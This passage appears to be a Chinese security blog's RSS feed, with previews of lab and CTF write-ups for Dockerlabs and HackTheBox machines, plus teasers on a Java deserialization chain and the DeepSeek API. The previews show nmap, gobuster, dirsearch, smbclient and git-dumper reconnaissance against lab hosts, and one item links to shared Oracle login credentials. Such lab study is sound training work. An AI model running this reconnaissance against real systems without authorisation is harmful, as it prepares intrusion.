&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;将&lt;strong&gt;norc.labs&lt;/strong&gt;添加到**/etc/hosts**&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dockerlabs-Mirame</title>
      <link>https://www.hyhforever.top/posts/2025/02/dockerlabs-mirame/</link>
      <pubDate>Sat, 22 Feb 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/02/dockerlabs-mirame/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Desktop  
❯ nmap 172.17.0.2 -sV  -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-22 10:42 CST
Nmap scan report for 172.17.0.2
Host is up (0.000085s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey: 
|   256 2c:ea:4a:d7:b4:c3:d4:e2:65:29:6c:12:c4:58:c9:49 (ECDSA)
|_  256 a7:a4:a4:2e:3b:c6:0a:e4:ec:bd:46:84:68:02:5d:30 (ED25519)
80/tcp open  http    Apache httpd 2.4.61 ((Debian))
|_http-title: Login Page
|_http-server-header: Apache/2.4.61 (Debian)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.09 ms 172.17.0.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.98 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;进入网页是一个登录页面，尝试使用常见的默认账户登陆失败。&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dockerlabs-Rutas</title>
      <link>https://www.hyhforever.top/posts/2025/02/dockerlabs-rutas/</link>
      <pubDate>Sat, 22 Feb 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/02/dockerlabs-rutas/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Rutas  
❯ nmap 172.17.0.2 -sV  -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-22 19:23 CST
Nmap scan report for 172.17.0.2
Host is up (0.000066s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0        0               0 Jul 11  2024 hola_disfruta
|_-rw-r--r-- 1 0        0             293 Jul 11  2024 respeta.zip
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:172.17.0.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.5 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.7p1 Ubuntu 3ubuntu13.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 63:16:54:2a:05:1d:8e:43:53:55:8b:d5:4e:35:c9:1f (ECDSA)
|_  256 21:24:77:5d:f8:2f:b2:64:ec:42:8b:0b:ef:f0:46:1b (ED25519)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.58 (Ubuntu)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.07 ms 172.17.0.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.49 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;ftp&#34;&gt;FTP&lt;/h2&gt;
&lt;p&gt;存在匿名登录，并且可以下载文件&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dockerlabs-Veveno</title>
      <link>https://www.hyhforever.top/posts/2025/02/dockerlabs-veveno/</link>
      <pubDate>Sat, 22 Feb 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/02/dockerlabs-veveno/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Veveno  
❯ nmap 172.17.0.2 -sV  -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-22 16:04 CST
Nmap scan report for 172.17.0.2
Host is up (0.000089s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 3ubuntu13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 89:9c:7b:99:95:b6:e8:03:5a:6a:d4:69:69:4a:8d:35 (ECDSA)
|_  256 ec:ec:90:44:4e:66:64:22:f6:8b:cd:29:d2:b5:60:6a (ED25519)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.09 ms 172.17.0.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.95 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;gobuster&#34;&gt;Gobuster&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Veveno  
❯ gobuster dir -u &amp;#34;http://172.17.0.2/&amp;#34; -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,html                                 ⏎
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) &amp;amp; Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.17.0.2/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 310] [--&amp;gt; http://172.17.0.2/uploads/]
/.html                (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
/problems.php         (Status: 200) [Size: 10671]
/index.html           (Status: 200) [Size: 10671]
/.php                 (Status: 403) [Size: 275]
/.html                (Status: 403) [Size: 275]
/server-status        (Status: 403) [Size: 275]
Progress: 661680 / 661683 (100.00%)
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;可以看到存在一个&lt;strong&gt;problems.php&lt;/strong&gt;，但是回显和&lt;strong&gt;index.html&lt;/strong&gt;是一样的，猜测需要构造一个参数&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dockerlabs-WalkingCMS</title>
      <link>https://www.hyhforever.top/posts/2025/02/dockerlabs-walkingcms/</link>
      <pubDate>Sat, 22 Feb 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/02/dockerlabs-walkingcms/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/walkingcms  
❯ nmap 172.17.0.2 -sV  -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-22 09:39 CST
Nmap scan report for 172.17.0.2
Host is up (0.000090s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.09 ms 172.17.0.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.87 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;进入网页后是&lt;strong&gt;apache&lt;/strong&gt;的默认页面&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dockerlabs-DanceSamba</title>
      <link>https://www.hyhforever.top/posts/2025/02/dockerlabs-dancesamba/</link>
      <pubDate>Fri, 21 Feb 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/02/dockerlabs-dancesamba/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/dance-samba  
❯ nmap 172.17.0.2 -sV  -A

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0        0              69 Aug 19  2024 nota.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:172.17.0.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.5 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 9.6p1 Ubuntu 3ubuntu13.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 a2:4e:66:7d:e5:2e:cf:df:54:39:b2:08:a9:97:79:21 (ECDSA)
|_  256 92:bf:d3:b8:20:ac:76:08:5b:93:d7:69:ef:e7:59:e1 (ED25519)
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time: 
|   date: 2025-02-21T12:45:31
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

TRACEROUTE
HOP RTT     ADDRESS
1   0.11 ms 172.17.0.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.37 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;enum4linux&#34;&gt;enum4linux&lt;/h2&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2025/02/dockerlabs-dancesamba/images/image-59.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2025/02/dockerlabs-dancesamba/images/image-59.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dockerlabs-Memesploit</title>
      <link>https://www.hyhforever.top/posts/2025/02/dockerlabs-memesploit/</link>
      <pubDate>Fri, 21 Feb 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/02/dockerlabs-memesploit/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Memesploit  
❯ nmap 172.17.0.2 -sV 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-21 19:06 CST
Nmap scan report for 172.17.0.2
Host is up (0.0000080s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.58 ((Ubuntu))
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.42 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;smb&#34;&gt;SMB&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Memesploit  
❯ smbclient -L //172.17.0.2/                                                                                                                             ⏎
Password for [WORKGROUP\root]:

        Sharename       Type      Comment
        --------- ---- -------
        print$          Disk      Printer Drivers
        share_memehydra Disk      
        IPC$            IPC       IPC Service (c9584cd8853e server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 172.17.0.2 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;存在一个&lt;strong&gt;share_memehydra&lt;/strong&gt;的目录，但是必须要密码才能登录。&lt;/p&gt;</description>
    </item>
    <item>
      <title>DockerLabs-Psycho</title>
      <link>https://www.hyhforever.top/posts/2025/02/dockerlabs-psycho/</link>
      <pubDate>Fri, 21 Feb 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/02/dockerlabs-psycho/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali  
❯ nmap 172.17.0.2 -sV   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-21 15:07 CST
Nmap scan report for 172.17.0.2
Host is up (0.0000080s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.45 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;dirsearch&#34;&gt;Dirsearch&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Psycho  
❯ dirsearch -u 172.17.0.2 -t 50     
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 50 | Wordlist size: 11460

Output File: /home/kali/Psycho/reports/_172.17.0.2/_25-02-21_15-09-17.txt

Target: http://172.17.0.2/

[15:09:17] Starting: 
[15:09:18] 403 - 275B  - /.ht_wsr.txt                                      
[15:09:18] 403 - 275B  - /.htaccess.bak1                                   
[15:09:18] 403 - 275B  - /.htaccess.orig
[15:09:18] 403 - 275B  - /.htaccess.sample                                 
[15:09:18] 403 - 275B  - /.htaccess.save
[15:09:18] 403 - 275B  - /.htaccess_extra                                  
[15:09:18] 403 - 275B  - /.htaccess_sc                                     
[15:09:18] 403 - 275B  - /.htaccessOLD
[15:09:18] 403 - 275B  - /.htaccessOLD2                                    
[15:09:18] 403 - 275B  - /.htm                                             
[15:09:18] 403 - 275B  - /.html
[15:09:18] 403 - 275B  - /.htaccessBAK
[15:09:18] 403 - 275B  - /.htpasswds                                       
[15:09:18] 403 - 275B  - /.httr-oauth                                      
[15:09:18] 403 - 275B  - /.htpasswd_test                                   
[15:09:18] 403 - 275B  - /.php                                             
[15:09:21] 403 - 275B  - /.htaccess_orig                                   
[15:09:24] 301 - 309B  - /assets  -&amp;gt;  http://172.17.0.2/assets/            
[15:09:24] 200 - 458B  - /assets/                                          
[15:09:38] 403 - 275B  - /server-status                                    
[15:09:38] 403 - 275B  - /server-status/                                   
                                                                             
Task Completed                 
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;在网页源码底部发现了一个&lt;strong&gt;ERROR&lt;/strong&gt;，意味着是不是他的调用方式有什么问题？或者什么参数有问题？&lt;/p&gt;</description>
    </item>
    <item>
      <title>CommonCollections-1</title>
      <link>https://www.hyhforever.top/posts/2025/02/common-collections-1/</link>
      <pubDate>Tue, 18 Feb 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/02/common-collections-1/</guid>
      <description>&lt;h2 id=&#34;about&#34;&gt;About&lt;/h2&gt;
&lt;p&gt;本文是关于&lt;strong&gt;Apache commons collections&lt;/strong&gt;反序列漏洞利用链的过程复现&lt;/p&gt;
&lt;h2 id=&#34;environment&#34;&gt;Environment&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;JDK version&lt;/th&gt;
          &lt;th&gt;jdk-8u65-windows-x64&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Common collections version&lt;/td&gt;
          &lt;td&gt;3.2.1&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href=&#34;https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html&#34;&gt;Java Archive Downloads - Java SE 8&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href=&#34;https://bugmenot.com/view/oracle.com&#34;&gt;oracle.com passwords - BugMeNot.&lt;/a&gt; (如果下载JDK需要登录，这里是免费的账户)&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Titanic</title>
      <link>https://www.hyhforever.top/posts/2025/02/htb-titanic/</link>
      <pubDate>Sun, 16 Feb 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/02/htb-titanic/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Titanic  
❯ nmap titanic.htb -sV -T4                                                                                                                    

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.52
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;readanyfiles&#34;&gt;ReadAnyFiles&lt;/h2&gt;
&lt;p&gt;进入&lt;strong&gt;titanic.htb&lt;/strong&gt;，点击&lt;strong&gt;Book Now&lt;/strong&gt;，使用&lt;strong&gt;burpsuite&lt;/strong&gt;进行抓包发现一个&lt;strong&gt;download&lt;/strong&gt;路由&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Cat</title>
      <link>https://www.hyhforever.top/posts/2025/02/htb-cat/</link>
      <pubDate>Thu, 13 Feb 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/02/htb-cat/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali  
❯ nmap cat.htb

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;dirsearch&#34;&gt;Dirsearch&lt;/h2&gt;
&lt;p&gt;存在&lt;strong&gt;git&lt;/strong&gt;泄露&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2025/02/htb-cat/images/image-2.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2025/02/htb-cat/images/image-2.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;用&lt;strong&gt;git-dumper&lt;/strong&gt;获取到源码&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Cat  
❯ git-dumper http://cat.htb/.git/ ./catgit  
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;xss&#34;&gt;XSS&lt;/h2&gt;
&lt;p&gt;在&lt;strong&gt;view_cat.php&lt;/strong&gt;中发现存在&lt;strong&gt;XSS&lt;/strong&gt;的可能性&lt;/p&gt;</description>
    </item>
    <item>
      <title>DeepSeekAPI调用教程</title>
      <link>https://www.hyhforever.top/posts/2025/01/deepseek-api-usage-tutorial/</link>
      <pubDate>Fri, 31 Jan 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/01/deepseek-api-usage-tutorial/</guid>
      <description>&lt;h2 id=&#34;前言&#34;&gt;前言&lt;/h2&gt;
&lt;p&gt;最近出来了一个新的国产&lt;strong&gt;AI&lt;/strong&gt;模型&lt;strong&gt;DeepSeek&lt;/strong&gt;，并且具有深度思考的功能。&lt;/p&gt;
&lt;p&gt;我体验过后感觉比&lt;strong&gt;ChatGPT&lt;/strong&gt;要好很多，体现在&lt;strong&gt;DeepSeek&lt;/strong&gt;能更好的理解用户的问题。&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Backfire</title>
      <link>https://www.hyhforever.top/posts/2025/01/htb-backfire/</link>
      <pubDate>Mon, 20 Jan 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/01/htb-backfire/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Backfire  
❯ nmap  backfire.htb -sV -Pn -T4  
                                                                                                                                                       
PORT     STATE    SERVICE  VERSION
22/tcp   open     ssh      OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0)
443/tcp  open     ssl/http nginx 1.22.1
5000/tcp filtered upnp
8000/tcp open     http     nginx 1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;访问&lt;strong&gt;backfire.htb:8000&lt;/strong&gt;可以得到两个文件&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Active</title>
      <link>https://www.hyhforever.top/posts/2025/01/htb-active/</link>
      <pubDate>Sat, 18 Jan 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/01/htb-active/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Windows&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
